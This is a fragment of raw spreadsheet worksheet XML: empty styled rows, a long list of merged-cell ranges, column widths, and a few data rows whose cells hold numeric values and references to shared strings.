      <c r="P972" s="31"/>
    </row>
    <row r="973">
      <c r="J973" s="30"/>
      <c r="K973" s="30"/>
      <c r="L973" s="30"/>
      <c r="M973" s="30"/>
      <c r="N973" s="30"/>
      <c r="O973" s="31"/>
      <c r="P973" s="31"/>
    </row>
    <row r="974">
      <c r="J974" s="30"/>
      <c r="K974" s="30"/>
      <c r="L974" s="30"/>
      <c r="M974" s="30"/>
      <c r="N974" s="30"/>
      <c r="O974" s="31"/>
      <c r="P974" s="31"/>
    </row>
    <row r="975">
      <c r="J975" s="30"/>
      <c r="K975" s="30"/>
      <c r="L975" s="30"/>
      <c r="M975" s="30"/>
      <c r="N975" s="30"/>
      <c r="O975" s="31"/>
      <c r="P975" s="31"/>
    </row>
    <row r="976">
      <c r="J976" s="30"/>
      <c r="K976" s="30"/>
      <c r="L976" s="30"/>
      <c r="M976" s="30"/>
      <c r="N976" s="30"/>
      <c r="O976" s="31"/>
      <c r="P976" s="31"/>
    </row>
    <row r="977">
      <c r="J977" s="30"/>
      <c r="K977" s="30"/>
      <c r="L977" s="30"/>
      <c r="M977" s="30"/>
      <c r="N977" s="30"/>
      <c r="O977" s="31"/>
      <c r="P977" s="31"/>
    </row>
    <row r="978">
      <c r="J978" s="30"/>
      <c r="K978" s="30"/>
      <c r="L978" s="30"/>
      <c r="M978" s="30"/>
      <c r="N978" s="30"/>
      <c r="O978" s="31"/>
      <c r="P978" s="31"/>
    </row>
    <row r="979">
      <c r="J979" s="30"/>
      <c r="K979" s="30"/>
      <c r="L979" s="30"/>
      <c r="M979" s="30"/>
      <c r="N979" s="30"/>
      <c r="O979" s="31"/>
      <c r="P979" s="31"/>
    </row>
    <row r="980">
      <c r="J980" s="30"/>
      <c r="K980" s="30"/>
      <c r="L980" s="30"/>
      <c r="M980" s="30"/>
      <c r="N980" s="30"/>
      <c r="O980" s="31"/>
      <c r="P980" s="31"/>
    </row>
    <row r="981">
      <c r="J981" s="30"/>
      <c r="K981" s="30"/>
      <c r="L981" s="30"/>
      <c r="M981" s="30"/>
      <c r="N981" s="30"/>
      <c r="O981" s="31"/>
      <c r="P981" s="31"/>
    </row>
    <row r="982">
      <c r="J982" s="30"/>
      <c r="K982" s="30"/>
      <c r="L982" s="30"/>
      <c r="M982" s="30"/>
      <c r="N982" s="30"/>
      <c r="O982" s="31"/>
      <c r="P982" s="31"/>
    </row>
    <row r="983">
      <c r="J983" s="30"/>
      <c r="K983" s="30"/>
      <c r="L983" s="30"/>
      <c r="M983" s="30"/>
      <c r="N983" s="30"/>
      <c r="O983" s="31"/>
      <c r="P983" s="31"/>
    </row>
    <row r="984">
      <c r="J984" s="30"/>
      <c r="K984" s="30"/>
      <c r="L984" s="30"/>
      <c r="M984" s="30"/>
      <c r="N984" s="30"/>
      <c r="O984" s="31"/>
      <c r="P984" s="31"/>
    </row>
    <row r="985">
      <c r="J985" s="30"/>
      <c r="K985" s="30"/>
      <c r="L985" s="30"/>
      <c r="M985" s="30"/>
      <c r="N985" s="30"/>
      <c r="O985" s="31"/>
      <c r="P985" s="31"/>
    </row>
    <row r="986">
      <c r="J986" s="30"/>
      <c r="K986" s="30"/>
      <c r="L986" s="30"/>
      <c r="M986" s="30"/>
      <c r="N986" s="30"/>
      <c r="O986" s="31"/>
      <c r="P986" s="31"/>
    </row>
    <row r="987">
      <c r="J987" s="30"/>
      <c r="K987" s="30"/>
      <c r="L987" s="30"/>
      <c r="M987" s="30"/>
      <c r="N987" s="30"/>
      <c r="O987" s="31"/>
      <c r="P987" s="31"/>
    </row>
    <row r="988">
      <c r="J988" s="30"/>
      <c r="K988" s="30"/>
      <c r="L988" s="30"/>
      <c r="M988" s="30"/>
      <c r="N988" s="30"/>
      <c r="O988" s="31"/>
      <c r="P988" s="31"/>
    </row>
    <row r="989">
      <c r="J989" s="30"/>
      <c r="K989" s="30"/>
      <c r="L989" s="30"/>
      <c r="M989" s="30"/>
      <c r="N989" s="30"/>
      <c r="O989" s="31"/>
      <c r="P989" s="31"/>
    </row>
    <row r="990">
      <c r="J990" s="30"/>
      <c r="K990" s="30"/>
      <c r="L990" s="30"/>
      <c r="M990" s="30"/>
      <c r="N990" s="30"/>
      <c r="O990" s="31"/>
      <c r="P990" s="31"/>
    </row>
    <row r="991">
      <c r="J991" s="30"/>
      <c r="K991" s="30"/>
      <c r="L991" s="30"/>
      <c r="M991" s="30"/>
      <c r="N991" s="30"/>
      <c r="O991" s="31"/>
      <c r="P991" s="31"/>
    </row>
    <row r="992">
      <c r="J992" s="30"/>
      <c r="K992" s="30"/>
      <c r="L992" s="30"/>
      <c r="M992" s="30"/>
      <c r="N992" s="30"/>
      <c r="O992" s="31"/>
      <c r="P992" s="31"/>
    </row>
    <row r="993">
      <c r="J993" s="30"/>
      <c r="K993" s="30"/>
      <c r="L993" s="30"/>
      <c r="M993" s="30"/>
      <c r="N993" s="30"/>
      <c r="O993" s="31"/>
      <c r="P993" s="31"/>
    </row>
    <row r="994">
      <c r="J994" s="30"/>
      <c r="K994" s="30"/>
      <c r="L994" s="30"/>
      <c r="M994" s="30"/>
      <c r="N994" s="30"/>
      <c r="O994" s="31"/>
      <c r="P994" s="31"/>
    </row>
    <row r="995">
      <c r="J995" s="30"/>
      <c r="K995" s="30"/>
      <c r="L995" s="30"/>
      <c r="M995" s="30"/>
      <c r="N995" s="30"/>
      <c r="O995" s="31"/>
      <c r="P995" s="31"/>
    </row>
    <row r="996">
      <c r="J996" s="30"/>
      <c r="K996" s="30"/>
      <c r="L996" s="30"/>
      <c r="M996" s="30"/>
      <c r="N996" s="30"/>
      <c r="O996" s="31"/>
      <c r="P996" s="31"/>
    </row>
    <row r="997">
      <c r="J997" s="30"/>
      <c r="K997" s="30"/>
      <c r="L997" s="30"/>
      <c r="M997" s="30"/>
      <c r="N997" s="30"/>
      <c r="O997" s="31"/>
      <c r="P997" s="31"/>
    </row>
    <row r="998">
      <c r="J998" s="30"/>
      <c r="K998" s="30"/>
      <c r="L998" s="30"/>
      <c r="M998" s="30"/>
      <c r="N998" s="30"/>
      <c r="O998" s="31"/>
      <c r="P998" s="31"/>
    </row>
    <row r="999">
      <c r="J999" s="30"/>
      <c r="K999" s="30"/>
      <c r="L999" s="30"/>
      <c r="M999" s="30"/>
      <c r="N999" s="30"/>
      <c r="O999" s="31"/>
      <c r="P999" s="31"/>
    </row>
    <row r="1000">
      <c r="J1000" s="30"/>
      <c r="K1000" s="30"/>
      <c r="L1000" s="30"/>
      <c r="M1000" s="30"/>
      <c r="N1000" s="30"/>
      <c r="O1000" s="31"/>
      <c r="P1000" s="31"/>
    </row>
  </sheetData>
  <mergeCells count="319">
    <mergeCell ref="AC3:AD3"/>
    <mergeCell ref="AC4:AD4"/>
    <mergeCell ref="AC5:AD5"/>
    <mergeCell ref="AC6:AD6"/>
    <mergeCell ref="AC8:AD8"/>
    <mergeCell ref="AC9:AD9"/>
    <mergeCell ref="AC10:AD10"/>
    <mergeCell ref="AC12:AD12"/>
    <mergeCell ref="AC13:AD13"/>
    <mergeCell ref="AC14:AD14"/>
    <mergeCell ref="AC15:AD15"/>
    <mergeCell ref="AC16:AD16"/>
    <mergeCell ref="AC17:AD17"/>
    <mergeCell ref="AC18:AD18"/>
    <mergeCell ref="AC19:AD19"/>
    <mergeCell ref="AC20:AD20"/>
    <mergeCell ref="AC21:AD21"/>
    <mergeCell ref="AC22:AD22"/>
    <mergeCell ref="AD24:AE24"/>
    <mergeCell ref="AC25:AD25"/>
    <mergeCell ref="AC26:AD26"/>
    <mergeCell ref="AC27:AD27"/>
    <mergeCell ref="AC28:AD28"/>
    <mergeCell ref="AC29:AD29"/>
    <mergeCell ref="AC30:AD30"/>
    <mergeCell ref="AC31:AD31"/>
    <mergeCell ref="AC32:AD32"/>
    <mergeCell ref="AC33:AD33"/>
    <mergeCell ref="AC34:AD34"/>
    <mergeCell ref="AC36:AD36"/>
    <mergeCell ref="AC37:AD37"/>
    <mergeCell ref="AC38:AD38"/>
    <mergeCell ref="AC39:AD39"/>
    <mergeCell ref="AC40:AD40"/>
    <mergeCell ref="AC41:AD41"/>
    <mergeCell ref="AC42:AD42"/>
    <mergeCell ref="AC46:AD46"/>
    <mergeCell ref="AC47:AD47"/>
    <mergeCell ref="AC48:AD48"/>
    <mergeCell ref="AC49:AD49"/>
    <mergeCell ref="AC50:AD50"/>
    <mergeCell ref="AC51:AD51"/>
    <mergeCell ref="AC52:AD52"/>
    <mergeCell ref="AC53:AD53"/>
    <mergeCell ref="AC54:AD54"/>
    <mergeCell ref="AC55:AD55"/>
    <mergeCell ref="AC56:AD56"/>
    <mergeCell ref="AC57:AD57"/>
    <mergeCell ref="AC58:AD58"/>
    <mergeCell ref="AC59:AD59"/>
    <mergeCell ref="AC60:AD60"/>
    <mergeCell ref="AC62:AD62"/>
    <mergeCell ref="AC63:AD63"/>
    <mergeCell ref="AC64:AD64"/>
    <mergeCell ref="AC65:AD65"/>
    <mergeCell ref="AC66:AD66"/>
    <mergeCell ref="AC67:AD67"/>
    <mergeCell ref="AC68:AD68"/>
    <mergeCell ref="AC69:AD69"/>
    <mergeCell ref="AC70:AD70"/>
    <mergeCell ref="AC71:AD71"/>
    <mergeCell ref="AC72:AD72"/>
    <mergeCell ref="AC73:AD73"/>
    <mergeCell ref="AC74:AD74"/>
    <mergeCell ref="AC75:AD75"/>
    <mergeCell ref="AC76:AD76"/>
    <mergeCell ref="AC77:AD77"/>
    <mergeCell ref="AC78:AD78"/>
    <mergeCell ref="AC79:AD79"/>
    <mergeCell ref="AC80:AD80"/>
    <mergeCell ref="AC81:AD81"/>
    <mergeCell ref="AC82:AD82"/>
    <mergeCell ref="AC83:AD83"/>
    <mergeCell ref="AC84:AD84"/>
    <mergeCell ref="AC85:AD85"/>
    <mergeCell ref="AC86:AD86"/>
    <mergeCell ref="AC87:AD87"/>
    <mergeCell ref="AC88:AD88"/>
    <mergeCell ref="AC89:AD89"/>
    <mergeCell ref="AC90:AD90"/>
    <mergeCell ref="AC91:AD91"/>
    <mergeCell ref="AC92:AD92"/>
    <mergeCell ref="AC93:AD93"/>
    <mergeCell ref="AC94:AD94"/>
    <mergeCell ref="AC95:AD95"/>
    <mergeCell ref="AC96:AD96"/>
    <mergeCell ref="AC97:AD97"/>
    <mergeCell ref="AC98:AD98"/>
    <mergeCell ref="AC99:AD99"/>
    <mergeCell ref="AC100:AD100"/>
    <mergeCell ref="AC101:AD101"/>
    <mergeCell ref="AC102:AD102"/>
    <mergeCell ref="AC103:AD103"/>
    <mergeCell ref="AC104:AD104"/>
    <mergeCell ref="AC105:AD105"/>
    <mergeCell ref="AC106:AD106"/>
    <mergeCell ref="AC107:AD107"/>
    <mergeCell ref="AC108:AD108"/>
    <mergeCell ref="AC109:AD109"/>
    <mergeCell ref="AC110:AD110"/>
    <mergeCell ref="AC111:AD111"/>
    <mergeCell ref="AC112:AD112"/>
    <mergeCell ref="AC113:AD113"/>
    <mergeCell ref="AC114:AD114"/>
    <mergeCell ref="AC115:AD115"/>
    <mergeCell ref="AC116:AD116"/>
    <mergeCell ref="AC117:AD117"/>
    <mergeCell ref="AC118:AD118"/>
    <mergeCell ref="AC119:AD119"/>
    <mergeCell ref="AC120:AD120"/>
    <mergeCell ref="AC121:AD121"/>
    <mergeCell ref="AC122:AD122"/>
    <mergeCell ref="AC123:AD123"/>
    <mergeCell ref="AC124:AD124"/>
    <mergeCell ref="AC125:AD125"/>
    <mergeCell ref="AC126:AD126"/>
    <mergeCell ref="AC127:AD127"/>
    <mergeCell ref="AC128:AD128"/>
    <mergeCell ref="AC129:AD129"/>
    <mergeCell ref="AC130:AD130"/>
    <mergeCell ref="AC131:AD131"/>
    <mergeCell ref="AC132:AD132"/>
    <mergeCell ref="AC133:AD133"/>
    <mergeCell ref="AC134:AD134"/>
    <mergeCell ref="AC135:AD135"/>
    <mergeCell ref="AC136:AD136"/>
    <mergeCell ref="AC137:AD137"/>
    <mergeCell ref="AC138:AD138"/>
    <mergeCell ref="AC139:AD139"/>
    <mergeCell ref="AC140:AD140"/>
    <mergeCell ref="AC141:AD141"/>
    <mergeCell ref="AC142:AD142"/>
    <mergeCell ref="AC143:AD143"/>
    <mergeCell ref="AC144:AD144"/>
    <mergeCell ref="AC145:AD145"/>
    <mergeCell ref="AC146:AD146"/>
    <mergeCell ref="AC147:AD147"/>
    <mergeCell ref="AC148:AD148"/>
    <mergeCell ref="AC149:AD149"/>
    <mergeCell ref="AC150:AD150"/>
    <mergeCell ref="AC151:AD151"/>
    <mergeCell ref="AC152:AD152"/>
    <mergeCell ref="AC153:AD153"/>
    <mergeCell ref="AC154:AD154"/>
    <mergeCell ref="AC155:AD155"/>
    <mergeCell ref="AC156:AD156"/>
    <mergeCell ref="AC157:AD157"/>
    <mergeCell ref="AC158:AD158"/>
    <mergeCell ref="AC159:AD159"/>
    <mergeCell ref="AC160:AD160"/>
    <mergeCell ref="AC161:AD161"/>
    <mergeCell ref="AC162:AD162"/>
    <mergeCell ref="AC163:AD163"/>
    <mergeCell ref="AC164:AD164"/>
    <mergeCell ref="AC165:AD165"/>
    <mergeCell ref="AC166:AD166"/>
    <mergeCell ref="AC167:AD167"/>
    <mergeCell ref="AC168:AD168"/>
    <mergeCell ref="AC169:AD169"/>
    <mergeCell ref="AC170:AD170"/>
    <mergeCell ref="AC171:AD171"/>
    <mergeCell ref="AC172:AD172"/>
    <mergeCell ref="AC173:AD173"/>
    <mergeCell ref="AC174:AD174"/>
    <mergeCell ref="AC175:AD175"/>
    <mergeCell ref="AC176:AD176"/>
    <mergeCell ref="AC177:AD177"/>
    <mergeCell ref="AC178:AD178"/>
    <mergeCell ref="AC179:AD179"/>
    <mergeCell ref="AC180:AD180"/>
    <mergeCell ref="AC181:AD181"/>
    <mergeCell ref="AC182:AD182"/>
    <mergeCell ref="AC183:AD183"/>
    <mergeCell ref="AC184:AD184"/>
    <mergeCell ref="AC185:AD185"/>
    <mergeCell ref="AC186:AD186"/>
    <mergeCell ref="AC187:AD187"/>
    <mergeCell ref="AC188:AD188"/>
    <mergeCell ref="AC189:AD189"/>
    <mergeCell ref="AC190:AD190"/>
    <mergeCell ref="AC191:AD191"/>
    <mergeCell ref="AC192:AD192"/>
    <mergeCell ref="AC193:AD193"/>
    <mergeCell ref="AC194:AD194"/>
    <mergeCell ref="AC195:AD195"/>
    <mergeCell ref="AC196:AD196"/>
    <mergeCell ref="AC197:AD197"/>
    <mergeCell ref="AC198:AD198"/>
    <mergeCell ref="AC199:AD199"/>
    <mergeCell ref="AC200:AD200"/>
    <mergeCell ref="AC201:AD201"/>
    <mergeCell ref="AC202:AD202"/>
    <mergeCell ref="AC203:AD203"/>
    <mergeCell ref="AC204:AD204"/>
    <mergeCell ref="R205:S205"/>
    <mergeCell ref="AC205:AD205"/>
    <mergeCell ref="AC206:AD206"/>
    <mergeCell ref="AC207:AD207"/>
    <mergeCell ref="AC208:AD208"/>
    <mergeCell ref="AC209:AD209"/>
    <mergeCell ref="AC210:AD210"/>
    <mergeCell ref="AC211:AD211"/>
    <mergeCell ref="AC212:AD212"/>
    <mergeCell ref="AC213:AD213"/>
    <mergeCell ref="AC214:AD214"/>
    <mergeCell ref="AC215:AD215"/>
    <mergeCell ref="AC216:AD216"/>
    <mergeCell ref="AC217:AD217"/>
    <mergeCell ref="AC218:AD218"/>
    <mergeCell ref="AC219:AD219"/>
    <mergeCell ref="AC220:AD220"/>
    <mergeCell ref="AC221:AD221"/>
    <mergeCell ref="AC222:AD222"/>
    <mergeCell ref="AC223:AD223"/>
    <mergeCell ref="AC224:AD224"/>
    <mergeCell ref="AC225:AD225"/>
    <mergeCell ref="AC226:AD226"/>
    <mergeCell ref="AC227:AD227"/>
    <mergeCell ref="AC228:AD228"/>
    <mergeCell ref="AC229:AD229"/>
    <mergeCell ref="AC230:AD230"/>
    <mergeCell ref="AC231:AD231"/>
    <mergeCell ref="AC232:AD232"/>
    <mergeCell ref="AC233:AD233"/>
    <mergeCell ref="AC234:AD234"/>
    <mergeCell ref="AC235:AD235"/>
    <mergeCell ref="AC236:AD236"/>
    <mergeCell ref="AC237:AD237"/>
    <mergeCell ref="AC238:AD238"/>
    <mergeCell ref="AC239:AD239"/>
    <mergeCell ref="AC240:AD240"/>
    <mergeCell ref="AC241:AD241"/>
    <mergeCell ref="AC242:AD242"/>
    <mergeCell ref="AC243:AD243"/>
    <mergeCell ref="AC244:AD244"/>
    <mergeCell ref="AC245:AD245"/>
    <mergeCell ref="AC246:AD246"/>
    <mergeCell ref="AC247:AD247"/>
    <mergeCell ref="AC248:AD248"/>
    <mergeCell ref="AC249:AD249"/>
    <mergeCell ref="AC250:AD250"/>
    <mergeCell ref="AC251:AD251"/>
    <mergeCell ref="AC252:AD252"/>
    <mergeCell ref="AC253:AD253"/>
    <mergeCell ref="AC254:AD254"/>
    <mergeCell ref="AC310:AD310"/>
    <mergeCell ref="AC311:AD311"/>
    <mergeCell ref="AC312:AD312"/>
    <mergeCell ref="R313:S313"/>
    <mergeCell ref="AC313:AD313"/>
    <mergeCell ref="AC303:AD303"/>
    <mergeCell ref="AC304:AD304"/>
    <mergeCell ref="AC305:AD305"/>
    <mergeCell ref="AC306:AD306"/>
    <mergeCell ref="AC307:AD307"/>
    <mergeCell ref="AC308:AD308"/>
    <mergeCell ref="AC309:AD309"/>
    <mergeCell ref="AC321:AD321"/>
    <mergeCell ref="AC322:AD322"/>
    <mergeCell ref="AC323:AD323"/>
    <mergeCell ref="AC324:AD324"/>
    <mergeCell ref="AC325:AD325"/>
    <mergeCell ref="AC326:AD326"/>
    <mergeCell ref="AC314:AD314"/>
    <mergeCell ref="AC315:AD315"/>
    <mergeCell ref="AC316:AD316"/>
    <mergeCell ref="AC317:AD317"/>
    <mergeCell ref="AC318:AD318"/>
    <mergeCell ref="AC319:AD319"/>
    <mergeCell ref="AC320:AD320"/>
    <mergeCell ref="AC255:AD255"/>
    <mergeCell ref="AC256:AD256"/>
    <mergeCell ref="AC257:AD257"/>
    <mergeCell ref="AC258:AD258"/>
    <mergeCell ref="AC259:AD259"/>
    <mergeCell ref="AC260:AD260"/>
    <mergeCell ref="AC261:AD261"/>
    <mergeCell ref="AC262:AD262"/>
    <mergeCell ref="AC263:AD263"/>
    <mergeCell ref="AC264:AD264"/>
    <mergeCell ref="AC265:AD265"/>
    <mergeCell ref="AC266:AD266"/>
    <mergeCell ref="AC267:AD267"/>
    <mergeCell ref="AC268:AD268"/>
    <mergeCell ref="AC269:AD269"/>
    <mergeCell ref="AC270:AD270"/>
    <mergeCell ref="AC271:AD271"/>
    <mergeCell ref="AC272:AD272"/>
    <mergeCell ref="AC273:AD273"/>
    <mergeCell ref="AC274:AD274"/>
    <mergeCell ref="AC275:AD275"/>
    <mergeCell ref="AC276:AD276"/>
    <mergeCell ref="AC277:AD277"/>
    <mergeCell ref="AC278:AD278"/>
    <mergeCell ref="AC279:AD279"/>
    <mergeCell ref="AC280:AD280"/>
    <mergeCell ref="AC281:AD281"/>
    <mergeCell ref="AC282:AD282"/>
    <mergeCell ref="AC283:AD283"/>
    <mergeCell ref="AC284:AD284"/>
    <mergeCell ref="AC285:AD285"/>
    <mergeCell ref="AC286:AD286"/>
    <mergeCell ref="AC287:AD287"/>
    <mergeCell ref="AC288:AD288"/>
    <mergeCell ref="AC289:AD289"/>
    <mergeCell ref="AC290:AD290"/>
    <mergeCell ref="AC291:AD291"/>
    <mergeCell ref="AC292:AD292"/>
    <mergeCell ref="AC293:AD293"/>
    <mergeCell ref="AC294:AD294"/>
    <mergeCell ref="AC295:AD295"/>
    <mergeCell ref="AC296:AD296"/>
    <mergeCell ref="AC297:AD297"/>
    <mergeCell ref="AC298:AD298"/>
    <mergeCell ref="AC299:AD299"/>
    <mergeCell ref="AC300:AD300"/>
    <mergeCell ref="AC301:AD301"/>
    <mergeCell ref="AC302:AD302"/>
    <mergeCell ref="R303:S30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0.13"/>
    <col customWidth="1" min="3" max="3" width="9.5"/>
    <col customWidth="1" min="4" max="4" width="8.38"/>
    <col customWidth="1" min="5" max="5" width="10.75"/>
    <col customWidth="1" min="6" max="6" width="7.0"/>
    <col customWidth="1" min="7" max="7" width="6.13"/>
    <col customWidth="1" min="8" max="8" width="5.5"/>
    <col customWidth="1" min="9" max="9" width="6.63"/>
    <col customWidth="1" min="10" max="10" width="5.63"/>
    <col customWidth="1" min="11" max="11" width="6.25"/>
    <col customWidth="1" min="12" max="12" width="5.13"/>
    <col customWidth="1" min="13" max="13" width="3.5"/>
    <col customWidth="1" min="14" max="14" width="4.63"/>
    <col customWidth="1" min="15" max="15" width="5.0"/>
    <col customWidth="1" min="16" max="16" width="5.63"/>
    <col customWidth="1" min="17" max="17" width="7.75"/>
    <col customWidth="1" min="18" max="18" width="7.13"/>
    <col customWidth="1" min="19" max="19" width="5.63"/>
    <col customWidth="1" min="20" max="20" width="9.0"/>
    <col customWidth="1" min="21" max="21" width="26.5"/>
    <col customWidth="1" min="22" max="22" width="19.13"/>
    <col customWidth="1" min="23" max="23" width="21.13"/>
    <col customWidth="1" min="24" max="25" width="35.13"/>
    <col customWidth="1" min="27" max="27" width="107.88"/>
    <col customWidth="1" min="29" max="29" width="8.88"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="32" t="s">
        <v>1065</v>
      </c>
      <c r="B1" s="32" t="s">
        <v>2</v>
      </c>
      <c r="C1" s="32" t="s">
        <v>3</v>
      </c>
      <c r="D1" s="32" t="s">
        <v>4</v>
      </c>
      <c r="E1" s="32" t="s">
        <v>5</v>
      </c>
      <c r="F1" s="32" t="s">
        <v>6</v>
      </c>
      <c r="G1" s="32" t="s">
        <v>7</v>
      </c>
      <c r="H1" s="32" t="s">
        <v>8</v>
      </c>
      <c r="I1" s="32" t="s">
        <v>16</v>
      </c>
      <c r="J1" s="32" t="s">
        <v>17</v>
      </c>
      <c r="K1" s="32" t="s">
        <v>18</v>
      </c>
      <c r="L1" s="32" t="s">
        <v>19</v>
      </c>
      <c r="M1" s="32" t="s">
        <v>20</v>
      </c>
      <c r="N1" s="32" t="s">
        <v>21</v>
      </c>
      <c r="O1" s="32" t="s">
        <v>23</v>
      </c>
      <c r="P1" s="32" t="s">
        <v>24</v>
      </c>
      <c r="Q1" s="32" t="s">
        <v>25</v>
      </c>
      <c r="R1" s="32" t="s">
        <v>26</v>
      </c>
      <c r="S1" s="32" t="s">
        <v>27</v>
      </c>
      <c r="T1" s="32" t="s">
        <v>28</v>
      </c>
      <c r="U1" s="32" t="s">
        <v>9</v>
      </c>
      <c r="V1" s="32" t="s">
        <v>10</v>
      </c>
      <c r="W1" s="33" t="s">
        <v>29</v>
      </c>
      <c r="X1" s="33" t="s">
        <v>12</v>
      </c>
      <c r="Y1" s="33" t="s">
        <v>13</v>
      </c>
      <c r="Z1" s="34" t="s">
        <v>14</v>
      </c>
      <c r="AA1" s="34" t="s">
        <v>15</v>
      </c>
      <c r="AB1" s="34" t="s">
        <v>22</v>
      </c>
      <c r="AC1" s="34" t="s">
        <v>1</v>
      </c>
      <c r="AD1" s="32"/>
      <c r="AE1" s="35"/>
      <c r="AF1" s="35"/>
    </row>
    <row r="2">
      <c r="A2" s="6">
        <f t="shared" ref="A2:A934" si="1">RAND()</f>
        <v>0.4031889594</v>
      </c>
      <c r="B2" s="29">
        <v>1.0</v>
      </c>
      <c r="C2" s="29">
        <v>130305.0</v>
      </c>
      <c r="D2" s="14"/>
      <c r="E2" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F2" s="14"/>
      <c r="G2" s="29">
        <v>5.0</v>
      </c>
      <c r="H2" s="29">
        <v>3129.0</v>
      </c>
      <c r="I2" s="29">
        <v>116192.0</v>
      </c>
      <c r="J2" s="15"/>
      <c r="K2" s="29">
        <v>98538.0</v>
      </c>
      <c r="L2" s="15"/>
      <c r="M2" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N2" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O2" s="29">
        <v>1.0</v>
      </c>
      <c r="P2" s="29">
        <v>5.0</v>
      </c>
      <c r="Q2" s="15"/>
      <c r="R2" s="15"/>
      <c r="S2" s="15"/>
      <c r="T2" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U2" s="5" t="s">
        <v>31</v>
      </c>
      <c r="V2" s="5" t="s">
        <v>32</v>
      </c>
      <c r="W2" s="37" t="s">
        <v>31</v>
      </c>
      <c r="X2" s="37" t="s">
        <v>31</v>
      </c>
      <c r="Y2" s="37" t="s">
        <v>1066</v>
      </c>
      <c r="Z2" s="38" t="s">
        <v>1067</v>
      </c>
      <c r="AA2" s="39" t="s">
        <v>1068</v>
      </c>
      <c r="AB2" s="38" t="s">
        <v>1069</v>
      </c>
      <c r="AC2" s="40">
        <v>130301.0</v>
      </c>
      <c r="AD2" s="5"/>
      <c r="AE2" s="14"/>
      <c r="AF2" s="14"/>
    </row>
    <row r="3">
      <c r="A3" s="6">
        <f t="shared" si="1"/>
        <v>0.2489439292</v>
      </c>
      <c r="B3" s="29">
        <v>1.0</v>
      </c>
      <c r="C3" s="14"/>
      <c r="D3" s="14"/>
      <c r="E3" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F3" s="14"/>
      <c r="G3" s="29">
        <v>1.0</v>
      </c>
      <c r="H3" s="29">
        <v>167.0</v>
      </c>
      <c r="I3" s="29">
        <v>249601.0</v>
      </c>
      <c r="J3" s="15"/>
      <c r="K3" s="15"/>
      <c r="L3" s="15"/>
      <c r="M3" s="15"/>
      <c r="N3" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O3" s="29">
        <v>1.0</v>
      </c>
      <c r="P3" s="29">
        <v>7.0</v>
      </c>
      <c r="Q3" s="15"/>
      <c r="R3" s="15"/>
      <c r="S3" s="15"/>
      <c r="T3" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U3" s="41" t="s">
        <v>31</v>
      </c>
      <c r="V3" s="41" t="s">
        <v>32</v>
      </c>
      <c r="W3" s="37" t="s">
        <v>31</v>
      </c>
      <c r="X3" s="37" t="s">
        <v>31</v>
      </c>
      <c r="Y3" s="37" t="s">
        <v>1070</v>
      </c>
      <c r="Z3" s="38" t="s">
        <v>1071</v>
      </c>
      <c r="AA3" s="39" t="s">
        <v>1072</v>
      </c>
      <c r="AB3" s="38" t="s">
        <v>1073</v>
      </c>
      <c r="AC3" s="40">
        <v>243715.0</v>
      </c>
      <c r="AD3" s="5"/>
      <c r="AE3" s="14"/>
      <c r="AF3" s="14"/>
    </row>
    <row r="4">
      <c r="A4" s="6">
        <f t="shared" si="1"/>
        <v>0.4859248666</v>
      </c>
      <c r="B4" s="29">
        <v>1.0</v>
      </c>
      <c r="C4" s="15"/>
      <c r="D4" s="14"/>
      <c r="E4" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F4" s="14"/>
      <c r="G4" s="29">
        <v>2.0</v>
      </c>
      <c r="H4" s="29">
        <v>251.0</v>
      </c>
      <c r="I4" s="29">
        <v>150159.0</v>
      </c>
      <c r="J4" s="15"/>
      <c r="K4" s="29">
        <v>6253.0</v>
      </c>
      <c r="L4" s="15"/>
      <c r="M4" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N4" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O4" s="29">
        <v>2.0</v>
      </c>
      <c r="P4" s="29">
        <v>2.0</v>
      </c>
      <c r="Q4" s="15"/>
      <c r="R4" s="15"/>
      <c r="S4" s="15"/>
      <c r="T4" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U4" s="5" t="s">
        <v>31</v>
      </c>
      <c r="V4" s="5" t="s">
        <v>1074</v>
      </c>
      <c r="W4" s="41" t="s">
        <v>160</v>
      </c>
      <c r="X4" s="18" t="s">
        <v>31</v>
      </c>
      <c r="Y4" s="18" t="s">
        <v>1075</v>
      </c>
      <c r="Z4" s="38" t="s">
        <v>1076</v>
      </c>
      <c r="AA4" s="39" t="s">
        <v>1077</v>
      </c>
      <c r="AB4" s="38" t="s">
        <v>1078</v>
      </c>
      <c r="AC4" s="40">
        <v>168507.0</v>
      </c>
      <c r="AD4" s="5"/>
      <c r="AE4" s="14"/>
      <c r="AF4" s="14"/>
    </row>
    <row r="5">
      <c r="A5" s="6">
        <f t="shared" si="1"/>
        <v>0.8457855087</v>
      </c>
      <c r="B5" s="29">
        <v>1.0</v>
      </c>
      <c r="C5" s="29">
        <v>75874.0</v>
      </c>
      <c r="D5" s="14"/>
      <c r="E5" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F5" s="14"/>
      <c r="G5" s="29">
        <v>3.0</v>
      </c>
      <c r="H5" s="29">
        <v>1493.0</v>
      </c>
      <c r="I5" s="29">
        <v>28403.0</v>
      </c>
      <c r="J5" s="15"/>
      <c r="K5" s="15"/>
      <c r="L5" s="15"/>
      <c r="M5" s="15"/>
      <c r="N5" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O5" s="29">
        <v>1.0</v>
      </c>
      <c r="P5" s="29">
        <v>3.0</v>
      </c>
      <c r="Q5" s="15"/>
      <c r="R5" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S5" s="15"/>
      <c r="T5" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U5" s="5" t="s">
        <v>74</v>
      </c>
      <c r="V5" s="5" t="s">
        <v>74</v>
      </c>
      <c r="W5" s="42" t="s">
        <v>1079</v>
      </c>
      <c r="X5" s="42" t="s">
        <v>74</v>
      </c>
      <c r="Y5" s="42" t="s">
        <v>1080</v>
      </c>
      <c r="Z5" s="38" t="s">
        <v>1081</v>
      </c>
      <c r="AA5" s="39" t="s">
        <v>1082</v>
      </c>
      <c r="AB5" s="38" t="s">
        <v>1083</v>
      </c>
      <c r="AC5" s="40">
